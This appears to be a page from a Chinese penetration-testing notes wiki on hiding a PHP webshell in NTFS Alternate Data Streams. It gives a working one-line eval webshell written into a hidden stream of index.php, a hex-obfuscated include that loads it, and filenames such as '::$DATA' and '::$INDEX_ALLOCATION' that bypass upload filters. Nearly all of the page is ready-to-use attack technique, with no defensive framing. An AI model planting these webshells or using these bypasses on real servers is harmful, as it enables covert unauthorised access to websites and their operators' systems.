ADS隐藏webshell

指定宿主文件，index.php是网页正常文件
>echo ^<?php @eval($_POST['chopper']);?^> > index.php:hidden.jpg
<?php include(‘index.php:hidden.jpg’)?>
<?php 
$a="696E6465782E7068703"."A68696464656E2E6A7067";#hex编码
$b="a";
include(PACK('H*',$$b))
?>
>echo 9527 > 1.txt:flag.txt
>notepad 1.txt:flag.txt
或不指定宿主文件
>echo hide > :key.txt
>cd ../
>notepad test:key.txt
上传处绕过

上传的文件名	服务器表面现象	生成的文件内容
test.php:a.jpg	生成test.php	空
test.php::$DATA	生成test.php
test.php::$INDEX_ALLOCATION	生成test.php文件夹	\
test.php::$DATA\0.jpg	生成0.jpg

上传的文件名

服务器表面现象

生成的文件内容

test.php:a.jpg

生成test.php

空

test.php::$DATA

生成test.php

test.php::$INDEX_ALLOCATION

生成test.php文件夹

test.php::$DATA\0.jpg

生成0.jpg

上一页ADS&JavaScript 下一页Bitadmin

最后更新于1年前